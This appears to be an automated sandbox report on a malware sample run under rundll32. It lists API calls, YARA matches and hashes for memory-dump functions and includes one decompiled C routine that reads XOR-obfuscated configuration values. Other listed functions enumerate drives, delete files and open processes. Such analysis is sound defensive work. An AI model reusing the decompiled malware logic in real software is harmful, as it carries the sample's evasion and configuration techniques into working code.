                                            • Part of subcall function 00B61C01: RtlAllocateHeap.NTDLL(00000000,00000001,00B71A23), ref: 00B61C0D
                                            • Part of subcall function 00B6294B: ExpandEnvironmentStringsW.KERNEL32(00B5AE31,00000000,00000000,00000001,00000000,00000000,?,00B5AE31,00000000,?,?,00000000), ref: 00B62962
                                            • Part of subcall function 00B6294B: ExpandEnvironmentStringsW.KERNEL32(00B5AE31,00000000,00000000,00000000), ref: 00B6297C
                                          • lstrlenW.KERNEL32(?,00000000,76D869A0,?,00000250,?,00000000), ref: 00B55A60
                                          • lstrlenW.KERNEL32(?,?,00000000), ref: 00B55A6C
                                          • memset.NTDLL ref: 00B55AB4
                                          • FindFirstFileW.KERNEL32(00000000,00000000), ref: 00B55ACF
                                          • lstrlenW.KERNEL32(0000002C), ref: 00B55B07
                                          • lstrlenW.KERNEL32(?), ref: 00B55B0F
                                          • memset.NTDLL ref: 00B55B32
                                          • wcscpy.NTDLL ref: 00B55B44
                                          • PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 00B55B6A
                                          • RtlEnterCriticalSection.NTDLL(?), ref: 00B55BA0
                                            • Part of subcall function 00B5C6B8: RtlFreeHeap.NTDLL(00000000,00000000,00B71A9A,00000000), ref: 00B5C6C4
                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 00B55BBC
                                          • FindNextFileW.KERNEL32(?,00000000), ref: 00B55BD5
                                          • WaitForSingleObject.KERNEL32(00000000), ref: 00B55BE7
                                          • FindClose.KERNEL32(?), ref: 00B55BFC
                                          • FindFirstFileW.KERNEL32(00000000,00000000), ref: 00B55C10
                                          • lstrlenW.KERNEL32(0000002C), ref: 00B55C32
                                          • FindNextFileW.KERNEL32(?,00000000), ref: 00B55CA8
                                          • WaitForSingleObject.KERNEL32(00000000), ref: 00B55CBA
                                          • FindClose.KERNEL32(?), ref: 00B55CD5
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Find$Filelstrlen$CloseCriticalEnvironmentExpandFirstHeapNextObjectSectionSingleStringsWaitmemset$AllocateEnterFreeLeaveNamePathwcscpy
                                          • String ID:
                                          • API String ID: 2962561936-0
                                          • Opcode ID: 6a703737a84e8d8784555b5b7baac1b3b1f477b80210c7b9a7a4fbcc2fbceffd
                                          • Instruction ID: 885528df8893255edf6bed86b90964105afaaf05d94b952970f7108c9fc42756
                                          • Opcode Fuzzy Hash: 6a703737a84e8d8784555b5b7baac1b3b1f477b80210c7b9a7a4fbcc2fbceffd
                                          • Instruction Fuzzy Hash: EA819E71504705AFC721AF68DC84F1BBBE8FF88306F0448A9F99997262DB74D8588F51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B51E50 Relevance: 18.5, APIs: 12, Instructions: 519memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 00B51E88
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 00B51EBA
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 00B51EEC
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 00B51F1E
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 00B51F50
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 00B51F82
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 00B51FB4
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 00B51FE6
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 00B52018
                                          • HeapFree.KERNEL32(00000000,?,?,?,?), ref: 00B521AB
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,?,?,?), ref: 00B5224F
                                            • Part of subcall function 00B6A2FF: RtlAllocateHeap.NTDLL ref: 00B6A340
                                            • Part of subcall function 00B6A2FF: memset.NTDLL ref: 00B6A354
                                            • Part of subcall function 00B6A2FF: GetCurrentThreadId.KERNEL32 ref: 00B6A3E1
                                            • Part of subcall function 00B6A2FF: GetCurrentThread.KERNEL32 ref: 00B6A3F4
                                            • Part of subcall function 00B5CDBF: RtlEnterCriticalSection.NTDLL(0614C2D0), ref: 00B5CDC8
                                            • Part of subcall function 00B5CDBF: HeapFree.KERNEL32(00000000,?), ref: 00B5CDFA
                                            • Part of subcall function 00B5CDBF: RtlLeaveCriticalSection.NTDLL(0614C2D0), ref: 00B5CE18
                                          • HeapFree.KERNEL32(00000000,?,?,?,?), ref: 00B521F7
                                            • Part of subcall function 00B53997: lstrlen.KERNEL32(?,00000000,76D86980,00000000,00B6780A,?), ref: 00B539A0
                                            • Part of subcall function 00B53997: memcpy.NTDLL(00000000,?,00000000,?), ref: 00B539C3
                                            • Part of subcall function 00B53997: memset.NTDLL ref: 00B539D2
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$Free$CriticalCurrentSectionThreadmemset$AllocateEnterLeavelstrlenmemcpy
                                          • String ID:
                                          • API String ID: 3296958911-0
                                          • Opcode ID: 66198abff073af17ef9798494ff134cce81facdc5a0c60bbd37b621b47dd00cd
                                          • Instruction ID: f567779b505911bce40729ebbb15f8a4c333955e3b259077c23fe4c0d7a827b6
                                          • Opcode Fuzzy Hash: 66198abff073af17ef9798494ff134cce81facdc5a0c60bbd37b621b47dd00cd
                                          • Instruction Fuzzy Hash: B1F1C4B1A01516AF9B10EB78CC89F6F33E8DB4934175588E0AC09F7240EF35DE898B65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B65830 Relevance: 16.6, APIs: 11, Instructions: 130libraryloadernativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000,69B25F44,00000000,?,?,00B5335A,?,00000000,?), ref: 00B65863
                                          • GetLastError.KERNEL32(?,?,00B5335A,?,00000000,?), ref: 00B65871
                                          • NtSetInformationProcess.NTDLL ref: 00B658CB
                                          • GetProcAddress.KERNEL32(?,00000000), ref: 00B6590A
                                          • GetProcAddress.KERNEL32(?), ref: 00B6592B
                                          • TerminateThread.KERNEL32(?,00000000,?,00000004,00000000), ref: 00B65982
                                          • CloseHandle.KERNEL32(?), ref: 00B65998
                                          • CloseHandle.KERNEL32(?), ref: 00B659BE
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressCloseHandleProcProcess$ErrorInformationLastOpenTerminateThread
                                          • String ID:
                                          • API String ID: 3529370251-0
                                          • Opcode ID: 42a79639f58f19bf6d649efb292153f35e3b3ba80b4893b6ed84c0d80edab54a
                                          • Instruction ID: e41218286bdcb415a8b52e6014463b6f52c2ce25f89e5931b9f62b060e11c692
                                          • Opcode Fuzzy Hash: 42a79639f58f19bf6d649efb292153f35e3b3ba80b4893b6ed84c0d80edab54a
                                          • Instruction Fuzzy Hash: 5E41AF71108745EFD7209F24CC48A6BBBF5FB88319F000A6DF599A7160D77489A8CF52
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B5591B Relevance: 16.6, APIs: 11, Instructions: 94memorystringsynchronizationCOMMON
                                          Download Yara Rule
                                          APIs
                                          • wcscpy.NTDLL ref: 00B5594F
                                          • GetLogicalDriveStringsW.KERNEL32(00000000,00000000), ref: 00B5595B
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 00B5596C
                                          • memset.NTDLL ref: 00B55989
                                          • GetLogicalDriveStringsW.KERNEL32(?,?), ref: 00B55997
                                          • WaitForSingleObject.KERNEL32(00000000), ref: 00B559A5
                                          • GetDriveTypeW.KERNEL32(?), ref: 00B559B3
                                          • lstrlenW.KERNEL32(?), ref: 00B559BF
                                          • wcscpy.NTDLL ref: 00B559D1
                                          • lstrlenW.KERNEL32(?), ref: 00B559EB
                                          • HeapFree.KERNEL32(00000000,?), ref: 00B55A04
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Drive$HeapLogicalStringslstrlenwcscpy$AllocateFreeObjectSingleTypeWaitmemset
                                          • String ID:
                                          • API String ID: 3888849384-0
                                          • Opcode ID: 784ed61d3829737415c34f618987a645f66ce758ae173cfdf00a40ee219ec8de
                                          • Instruction ID: 50e455303d91c487ab8dfb7a397e63eb094123fd703413d21ce1aaafcdfd46f3
                                          • Opcode Fuzzy Hash: 784ed61d3829737415c34f618987a645f66ce758ae173cfdf00a40ee219ec8de
                                          • Instruction Fuzzy Hash: 2231217280010CFFDB119BA4DC84DEEBBBDEF09326B104496F509E3120DB359E959B60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0489475F Relevance: 12.3, APIs: 8, Instructions: 258memoryCOMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 93%
                                          			E0489475F(void* __ebx, int* __ecx, void* __edi, void* __esi) {
				int _v8;
				void* _v12;
				void* _v16;
				signed int _t28;
				signed int _t33;
				signed int _t39;
				char* _t45;
				char* _t46;
				char* _t47;
				char* _t48;
				char* _t49;
				char* _t50;
				void* _t51;
				void* _t52;
				void* _t53;
				intOrPtr _t54;
				void* _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				signed int _t61;
				intOrPtr _t64;
				signed int _t65;
				signed int _t70;
				void* _t72;
				void* _t73;
				signed int _t75;
				signed int _t78;
				signed int _t82;
				signed int _t86;
				signed int _t90;
				signed int _t94;
				signed int _t98;
				void* _t101;
				void* _t102;
				void* _t115;
				void* _t118;
				intOrPtr _t121;

				_t118 = __esi;
				_t115 = __edi;
				_t104 = __ecx;
				_t101 = __ebx;
				_t28 =  *0x489a344; // 0x69b25f44
				if(E04894556( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x110) {
					 *0x489a378 = _v8;
				}
				_t33 =  *0x489a344; // 0x69b25f44
				if(E04894556( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
					_v12 = 2;
					L69:
					return _v12;
				}
				_t39 =  *0x489a344; // 0x69b25f44
				_push(_t115);
				if(E04894556( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
					L67:
					HeapFree( *0x489a2d8, 0, _v16);
					goto L69;
				} else {
					_push(_t101);
					_t102 = _v12;
					if(_t102 == 0) {
						_t45 = 0;
					} else {
						_t98 =  *0x489a344; // 0x69b25f44
						_t45 = E0489296E(_t104, _t102, _t98 ^ 0x7895433b);
					}
					_push(_t118);
					if(_t45 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
							 *0x489a2e0 = _v8;
						}
					}
					if(_t102 == 0) {
						_t46 = 0;
					} else {
						_t94 =  *0x489a344; // 0x69b25f44
						_t46 = E0489296E(_t104, _t102, _t94 ^ 0x219b08c7);
					}
					if(_t46 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
							 *0x489a2e4 = _v8;
						}
					}
					if(_t102 == 0) {
						_t47 = 0;
					} else {
						_t90 =  *0x489a344; // 0x69b25f44
						_t47 = E0489296E(_t104, _t102, _t90 ^ 0x31fc0661);
					}
					if(_t47 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
							 *0x489a2e8 = _v8;
						}
					}
					if(_t102 == 0) {
						_t48 = 0;
					} else {
						_t86 =  *0x489a344; // 0x69b25f44
						_t48 = E0489296E(_t104, _t102, _t86 ^ 0x0cd926ce);
					}
					if(_t48 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
							 *0x489a004 = _v8;
						}
					}
					if(_t102 == 0) {
						_t49 = 0;
					} else {
						_t82 =  *0x489a344; // 0x69b25f44
						_t49 = E0489296E(_t104, _t102, _t82 ^ 0x3cd8b2cb);
					}
					if(_t49 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
							 *0x489a02c = _v8;
						}
					}
					if(_t102 == 0) {
						_t50 = 0;
					} else {
						_t78 =  *0x489a344; // 0x69b25f44
						_t50 = E0489296E(_t104, _t102, _t78 ^ 0x2878b929);
					}
					if(_t50 == 0) {
						L41:
						 *0x489a2ec = 5;
						goto L42;
					} else {
						_t104 =  &_v8;
						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
							goto L41;
						} else {
							L42:
							if(_t102 == 0) {
								_t51 = 0;
							} else {
								_t75 =  *0x489a344; // 0x69b25f44
								_t51 = E0489296E(_t104, _t102, _t75 ^ 0x261a367a);
							}
							if(_t51 != 0) {
								_push(_t51);
								_t72 = 0x10;
								_t73 = E04893A24(_t72);
								if(_t73 != 0) {
									_push(_t73);
									E04893F7E();
								}
							}
							if(_t102 == 0) {
								_t52 = 0;
							} else {
								_t70 =  *0x489a344; // 0x69b25f44
								_t52 = E0489296E(_t104, _t102, _t70 ^ 0xb9d404b2);
							}
							if(_t52 != 0 && E04893A24(0, _t52) != 0) {
								_t121 =  *0x489a3cc; // 0x52495b0
								E048968F5(_t121 + 4, _t68);
							}
							if(_t102 == 0) {
								_t53 = 0;
							} else {
								_t65 =  *0x489a344; // 0x69b25f44
								_t53 = E0489296E(_t104, _t102, _t65 ^ 0x3df17130);
							}
							if(_t53 == 0) {
								L59:
								_t54 =  *0x489a348; // 0x9ad5a8
								_t22 = _t54 + 0x489b252; // 0x616d692f
								 *0x489a374 = _t22;
								goto L60;
							} else {
								_t64 = E04893A24(0, _t53);
								 *0x489a374 = _t64;
								if(_t64 != 0) {
									L60:
									if(_t102 == 0) {
										_t56 = 0;
									} else {
										_t61 =  *0x489a344; // 0x69b25f44
										_t56 = E0489296E(_t104, _t102, _t61 ^ 0xd2079859);
									}
									if(_t56 == 0) {
										_t57 =  *0x489a348; // 0x9ad5a8
										_t23 = _t57 + 0x489b791; // 0x6976612e
										_t58 = _t23;
									} else {
										_t58 = E04893A24(0, _t56);
									}
									 *0x489a3e0 = _t58;
									HeapFree( *0x489a2d8, 0, _t102);
									_v12 = 0;
									goto L67;
								}
								goto L59;
							}
						}
					}
				}
			}








































                                          0x0489475f
                                          0x0489475f
                                          0x0489475f
                                          0x0489475f
                                          0x04894762
                                          0x0489477f
                                          0x0489478d
                                          0x0489478d
                                          0x04894792
                                          0x048947ac
                                          0x04894a1a
                                          0x04894a21
                                          0x04894a25
                                          0x04894a25
                                          0x048947b2
                                          0x048947b7
                                          0x048947cf
                                          0x04894a07
                                          0x04894a11
                                          0x00000000
                                          0x048947d5
                                          0x048947d5
                                          0x048947d6
                                          0x048947db
                                          0x048947f1
                                          0x048947dd
                                          0x048947dd
                                          0x048947ea
                                          0x048947ea
                                          0x048947f3
                                          0x048947fc
                                          0x048947fe
                                          0x04894808
                                          0x0489480d
                                          0x0489480d
                                          0x04894808
                                          0x04894814
                                          0x0489482a
                                          0x04894816
                                          0x04894816
                                          0x04894823
                                          0x04894823
                                          0x0489482e
                                          0x04894830
                                          0x0489483a
                                          0x0489483f
                                          0x0489483f
                                          0x0489483a
                                          0x04894846
                                          0x0489485c
                                          0x04894848
                                          0x04894848
                                          0x04894855
                                          0x04894855
                                          0x04894860
                                          0x04894862
                                          0x0489486c
                                          0x04894871
                                          0x04894871
                                          0x0489486c
                                          0x04894878
                                          0x0489488e
                                          0x0489487a
                                          0x0489487a
                                          0x04894887
                                          0x04894887
                                          0x04894892
                                          0x04894894
                                          0x0489489e
                                          0x048948a3
                                          0x048948a3
                                          0x0489489e
                                          0x048948aa
                                          0x048948c0
                                          0x048948ac
                                          0x048948ac
                                          0x048948b9
                                          0x048948b9
                                          0x048948c4
                                          0x048948c6
                                          0x048948d0
                                          0x048948d5
                                          0x048948d5
                                          0x048948d0
                                          0x048948dc
                                          0x048948f2
                                          0x048948de
                                          0x048948de
                                          0x048948eb
                                          0x048948eb
                                          0x048948f6
                                          0x04894909
                                          0x04894909
                                          0x00000000
                                          0x048948f8
                                          0x048948f8
                                          0x04894902
                                          0x00000000
                                          0x04894913
                                          0x04894913
                                          0x04894915
                                          0x0489492b
                                          0x04894917
                                          0x04894917
                                          0x04894924
                                          0x04894924
                                          0x0489492f
                                          0x04894931
                                          0x04894934
                                          0x04894935
                                          0x0489493c
                                          0x0489493e
                                          0x0489493f
                                          0x0489493f
                                          0x0489493c
                                          0x04894946
                                          0x0489495c
                                          0x04894948
                                          0x04894948
                                          0x04894955
                                          0x04894955
                                          0x04894960
                                          0x0489496e
                                          0x04894978
                                          0x04894978
                                          0x04894980
                                          0x04894996
                                          0x04894982
                                          0x04894982
                                          0x0489498f
                                          0x0489498f
                                          0x0489499a
                                          0x048949ad
                                          0x048949ad
                                          0x048949b2
                                          0x048949b8
                                          0x00000000
                                          0x0489499c
                                          0x0489499f
                                          0x048949a4
                                          0x048949ab
                                          0x048949bd
                                          0x048949bf
                                          0x048949d5
                                          0x048949c1
                                          0x048949c1
                                          0x048949ce
                                          0x048949ce
                                          0x048949d9
                                          0x048949e5
                                          0x048949ea
                                          0x048949ea
                                          0x048949db
                                          0x048949de
                                          0x048949de
                                          0x048949f8
                                          0x048949fd
                                          0x04894a03
                                          0x00000000
                                          0x04894a06
                                          0x00000000
                                          0x048949ab
                                          0x0489499a
                                          0x04894902
                                          0x048948f6

                                          APIs
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,0489A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 04894804
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,0489A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 04894836
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,0489A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 04894868
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,0489A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 0489489A
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,0489A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 048948CC
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,0489A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 048948FE
                                          • HeapFree.KERNEL32(00000000,?,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 048949FD
                                          • HeapFree.KERNEL32(00000000,?,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 04894A11
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: 7a0a2b9c974cbf79f392a6814d4574c40ecb608854ec1359b1817e83547e9353
                                          • Instruction ID: 4a6173bd2eef4962fc601b8c62b83db9b4116e074847e8bd18acc34339edc4cb
                                          • Opcode Fuzzy Hash: 7a0a2b9c974cbf79f392a6814d4574c40ecb608854ec1359b1817e83547e9353
                                          • Instruction Fuzzy Hash: EC818070B14E44ABDF15EBB89984D6F77E9EB48A0472C0F69E401E3104EA79FD42A760
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B5CE21 Relevance: 12.1, APIs: 8, Instructions: 111stringfileCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00B53AA7: ExpandEnvironmentStringsW.KERNEL32(74DB06E0,00000000,00000000,74DB06E0,?,80000001,00B68CB5,?,74DB06E0,00B5407B,?,?,00000000,?), ref: 00B53AB8
                                            • Part of subcall function 00B53AA7: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,00000000,?,80000001,00B68CB5,?,74DB06E0,00B5407B,?,?,00000000,?), ref: 00B53AD5
                                          • FreeLibrary.KERNEL32(?), ref: 00B5CF57
                                            • Part of subcall function 00B60F11: lstrlenW.KERNEL32(?,00000000,?,?,?,00B5CE9C,?,?), ref: 00B60F1E
                                            • Part of subcall function 00B60F11: GetCurrentDirectoryW.KERNEL32(00007FFF,00000000,00010012,?,?,?,00B5CE9C,?,?), ref: 00B60F47
                                            • Part of subcall function 00B60F11: lstrcpyW.KERNEL32(-0000FFFE,?), ref: 00B60F67
                                            • Part of subcall function 00B60F11: lstrcpyW.KERNEL32(-00000002,?), ref: 00B60F83
                                            • Part of subcall function 00B60F11: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00B5CE9C,?,?), ref: 00B60F8F
                                            • Part of subcall function 00B60F11: LoadLibraryW.KERNEL32(-0000FFFE,?,?,?,?,00B5CE9C,?,?), ref: 00B60F92
                                            • Part of subcall function 00B60F11: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00B5CE9C,?,?), ref: 00B60F9E
                                            • Part of subcall function 00B60F11: GetProcAddress.KERNEL32(00000000,?), ref: 00B60FBB
                                            • Part of subcall function 00B60F11: GetProcAddress.KERNEL32(00000000,?), ref: 00B60FD5
                                            • Part of subcall function 00B60F11: GetProcAddress.KERNEL32(00000000,?), ref: 00B60FEB
                                            • Part of subcall function 00B60F11: GetProcAddress.KERNEL32(00000000,?), ref: 00B61001
                                            • Part of subcall function 00B60F11: GetProcAddress.KERNEL32(00000000,?), ref: 00B61017
                                            • Part of subcall function 00B60F11: GetProcAddress.KERNEL32(00000000,?), ref: 00B6102D
                                          • FindFirstFileW.KERNEL32(?,?,?,?), ref: 00B5CEAD
                                          • lstrlenW.KERNEL32(?), ref: 00B5CEC9
                                          • lstrlenW.KERNEL32(?), ref: 00B5CEE1
                                            • Part of subcall function 00B61C01: RtlAllocateHeap.NTDLL(00000000,00000001,00B71A23), ref: 00B61C0D
                                          • lstrcpyW.KERNEL32(00000000,?), ref: 00B5CEFA
                                          • lstrcpyW.KERNEL32(00000002), ref: 00B5CF0F
                                            • Part of subcall function 00B5414B: lstrlenW.KERNEL32(?), ref: 00B5415B
                                            • Part of subcall function 00B5414B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000,00000001), ref: 00B5417D
                                            • Part of subcall function 00B5414B: lstrcpyW.KERNEL32(00000000,?), ref: 00B541A9
                                            • Part of subcall function 00B5414B: lstrcatW.KERNEL32(00000000,?), ref: 00B541BC
                                          • FindNextFileW.KERNEL32(?,00000010), ref: 00B5CF37
                                          • FindClose.KERNEL32(00000002), ref: 00B5CF45
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressProc$lstrcpy$lstrlen$CurrentDirectoryFind$EnvironmentExpandFileLibraryStrings$AllocateByteCharCloseFirstFreeHeapLoadMultiNextWidelstrcat
                                          • String ID:
                                          • API String ID: 1209511739-0
                                          • Opcode ID: 13df244c6848cf4968d9a95c89c6cf181a3205781da035031d71152cebca3ffd
                                          • Instruction ID: f687b9034d2645e0794ae0df28910961fa07beb292fd254caad177556e54c1b4
                                          • Opcode Fuzzy Hash: 13df244c6848cf4968d9a95c89c6cf181a3205781da035031d71152cebca3ffd
                                          • Instruction Fuzzy Hash: 56416D710083059FC711EF64DC49A2FBBEAFB88B06F0409A9F984A3150DB35DA5DCB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B5FCC0 Relevance: 10.6, APIs: 7, Instructions: 109filestringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlenW.KERNEL32(?), ref: 00B5FCD8
                                            • Part of subcall function 00B61C01: RtlAllocateHeap.NTDLL(00000000,00000001,00B71A23), ref: 00B61C0D
                                          • FindFirstFileW.KERNEL32(?,00000000,?,00000250,?,0000000A,00000208), ref: 00B5FD41
                                          • lstrlenW.KERNEL32(00000250,?,00000250,?,0000000A,00000208), ref: 00B5FD69
                                          • RemoveDirectoryW.KERNEL32(?,?,00000250,?,0000000A,00000208), ref: 00B5FDBB
                                          • DeleteFileW.KERNEL32(?,?,00000250,?,0000000A,00000208), ref: 00B5FDC6
                                          • FindNextFileW.KERNEL32(?,00000000,?,00000250,?,0000000A,00000208), ref: 00B5FDD9
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$Findlstrlen$AllocateDeleteDirectoryFirstHeapNextRemove
                                          • String ID:
                                          • API String ID: 499515686-0
                                          • Opcode ID: c6c727d19fe4a9d2d722927994e059ddc54b5bcdbbde75c15f51a8d63fe54e05
                                          • Instruction ID: 7d0285d8d5bf3ca586d652270791da9508750afa92e664bf2cf095d323eff8f9
                                          • Opcode Fuzzy Hash: c6c727d19fe4a9d2d722927994e059ddc54b5bcdbbde75c15f51a8d63fe54e05
                                          • Instruction Fuzzy Hash: A441387180020AEFDF11AFA4DC45BAEBBF9EF04306F2044F5E915A71A5DB718A98DB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B5A513 Relevance: 9.1, APIs: 6, Instructions: 64libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00B61C01: RtlAllocateHeap.NTDLL(00000000,00000001,00B71A23), ref: 00B61C0D
                                          • LoadLibraryA.KERNEL32(?,00000000,?,00000014,?,00B54E94), ref: 00B5A533
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00B5A552
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00B5A567
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00B5A57D
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00B5A593
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00B5A5A9
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressProc$AllocateHeapLibraryLoad
                                          • String ID:
                                          • API String ID: 2486251641-0
                                          • Opcode ID: a8bf63c9c13f77a12853fb9cae0ae2c13fd4f191d6c70fc7afdfc90faba92fab
                                          • Instruction ID: d6e66ff37d5349fb071deafbba2def189959dc6208f421ec6a91b41b3f6a4385
                                          • Opcode Fuzzy Hash: a8bf63c9c13f77a12853fb9cae0ae2c13fd4f191d6c70fc7afdfc90faba92fab
                                          • Instruction Fuzzy Hash: BB11337120060FAFDB209B69EC84E66B7ECEF1430234645E6EA4AD7351EB30DD448F60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B57A1E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101COMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.NTDLL ref: 00B57A40
                                            • Part of subcall function 00B6AD9E: NtAllocateVirtualMemory.NTDLL(00B57A68,00000000,00000000,00B57A68,00003000,00000040), ref: 00B6ADCF
                                            • Part of subcall function 00B6AD9E: RtlNtStatusToDosError.NTDLL(00000000), ref: 00B6ADD6
                                            • Part of subcall function 00B6AD9E: SetLastError.KERNEL32(00000000), ref: 00B6ADDD
                                          • GetLastError.KERNEL32(?,00000318,00000008), ref: 00B57B50
                                            • Part of subcall function 00B529B2: RtlNtStatusToDosError.NTDLL(00000000), ref: 00B529CA
                                          • memcpy.NTDLL(00000218,00B732B0,00000100,?,00010003,00001003,?,00000318,00000008), ref: 00B57ACF
                                          • RtlNtStatusToDosError.NTDLL(00000000), ref: 00B57B29
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Error$Status$Last$AllocateMemoryVirtualmemcpymemset
                                          • String ID:
                                          • API String ID: 2966525677-3916222277
